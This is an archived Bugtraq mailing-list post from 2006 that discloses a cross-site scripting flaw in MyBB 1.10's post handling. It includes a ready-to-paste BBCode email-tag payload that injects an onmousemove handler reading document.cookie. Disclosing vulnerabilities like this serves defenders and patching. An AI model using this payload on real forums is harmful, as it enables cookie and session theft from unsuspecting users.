Bugtraq mailing list archives

MyBB 1.10 New CrossSiteScripting


From: o.y.6 () hotmail com
Date: 2 Apr 2006 18:15:07 -0000

MyBB 1.10 CrossSiteScripting

        File :- inc/functions_post.php

BugTraqer :- Devil-00 < stranger-killer () hotmail com >

we can do attack by some unfilter tags :-
        
        Post New Thread Or New Replay With This Code :D
        And Try To Move The Mouse Over The Email ;)
        
        [code]
                [email=a" onmousemove="alert(document.cookie);" aaa () aaa aaa]Click Here![/email]
        [/code]
Palestinian Hacker < Devil-00 | D3vil-0x1 >
        Visit Palestine Thro www.palestinepnly.com


Current thread: